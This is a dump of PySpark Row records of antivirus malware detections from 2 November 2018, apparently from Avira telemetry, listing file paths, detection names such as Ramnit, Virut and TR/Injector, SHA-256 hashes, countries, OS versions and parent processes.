  Row(detection=Row(filename='libapriconv-1.dll', filepath='G:\\PPGBM Offline LV\\apache2\\bin\\libapriconv-1.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='34e14ee7b7f49d408e266242f1c74209a7151e3b7cd57498f6f3611ca9ae9daf', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1716224, timestamp='2018-11-02T04:40:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15CDC877B347566B3E988688C259784EE564A86FFBC11098419B7A41E5C66654', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wd apps setup.exe', filepath='\\\\?\\E:\\My Passport Apps for Mac\\WD Apps Setup.exe', filesize=4224000, name='TR/Patched.Gen.#M300.#R3374'), hash='3727f3a489289c1fcc6a1edb90f2af0c1f512f17825053200ba88f9ceedfefcc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:00:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='windows 10 activator (updated).exe', filepath='G:\\WINDOWS 10 ACTIVATOR (UPDATED).EXE', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:51:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BAEAE4F38C82AC7F2FF54EBC54C82339F53059D0B5D44B5AE58CA2F80AB605E', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:51:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T19:48:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-015519-c0e5a86a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-015519-C0E5A86A', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:57:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-220403-9c89463a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-220403-9C89463A', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='data.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\PingPong3D\\DATA\\DATA.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='183d110a328ffdcec666fbc97c7fae5f4c055094110cdd6de564ffb77abe9bd6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='frames.scr', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Photo Frames\\Frames.scr', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clearkey.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Firefox\\gmp-clearkey\\0.1\\clearkey.dll', filesize=64000, name='TR/Ghokswa.cmyuy.#M1.#R1'), hash='41077660379f45c0e649cabf57898a27ed29b2e4c0e37e06dbd4fd82a06ed9d5', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:37:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061231-40a90654', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061231-40A90654', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053107-781f828a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053107-781F828A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053231-a9eeecad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053231-A9EEECAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153336-c5e7b92f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153336-C5E7B92F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:36:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055605-f5099563', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055605-F5099563', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winprotect.exe', filepath='\\\\?\\C:\\Windows.old\\Users\\Guilherme Almeida\\AppData\\Roaming\\Microsoft\\Windows Protect\\winprotect.exe', filesize=1528000, name='TR/Black.Gen2.#M300.#R100338'), hash='6387005fdcfdd4214cd75ce9cc14961b988d6ab11117de1bb64f8a639ef06916', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:56:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AUT Client\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='58976432b3037c64669a08a76209791c56a1c7e76f5ea872de52c4d77314ff22', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe803_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe803 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:45:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050713-21315694', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050713-21315694', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050400-ae7ee117', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050400-AE7EE117', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170902-a6ecfd0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e785e07\\AVSCAN-20181102-170845-A4EE9F37\\AVSCAN-20181102-170902-A6ECFD0A', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100235-bca9785d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100148-B6DD3C51\\AVSCAN-20181102-100235-BCA9785D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nenosa.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp6823540\\nenosa.exe', filesize=384000, name='HEUR/AGEN.1019710.#M1.#R1'), hash='49824b90c407fe18622be622af760de3518c95d8718e03ea11132b3f914b813d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashmemorytoolkit.exe', filepath='E:\\HBCD\\Programs\\FlashMemoryToolkit.exe', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051530-499850bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051530-499850BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='49f0ff1bf24fd1c0c796f0aca91afa7ab791afc1daa8f206d4e052dda7c78a37', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\49F0FF1BF24FD1C0C796F0ACA91AFA7AB791AFC1DAA8F206D4E052DDA7C78A37', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='49f0ff1bf24fd1c0c796f0aca91afa7ab791afc1daa8f206d4e052dda7c78a37', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:18:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062330-c9732377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062330-C9732377', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050711-204610d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050711-204610D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa7588.27377\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa7588.27377\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T04:18:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123322-5641d18c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16818d22\\AVSCAN-20181102-123252-50E21CEB\\AVSCAN-20181102-123322-5641D18C', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:33:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165204-559b477d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a2221236\\AVSCAN-20181102-165144-516040C4\\AVSCAN-20181102-165204-559B477D', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4e456b0aaaf15232bd7f8a8ae8ffbb0c95469d4c9df4c8be6c7a6c2decef4990', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4E456B0AAAF15232BD7F8A8AE8FFBB0C95469D4C9DF4C8BE6C7A6C2DECEF4990', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4e456b0aaaf15232bd7f8a8ae8ffbb0c95469d4c9df4c8be6c7a6c2decef4990', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:16:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050321-97075943', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050321-97075943', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052911-332cfd85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052911-332CFD85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060143-be5c5a62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060143-BE5C5A62', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055626-0186c0a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055626-0186C0A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061021-f2e0b1e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061021-F2E0B1E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060852-be052f69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060852-BE052F69', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053628-37596f3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053628-37596F3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:27Z'), dt=datetime.date(2018, 11, 2)),
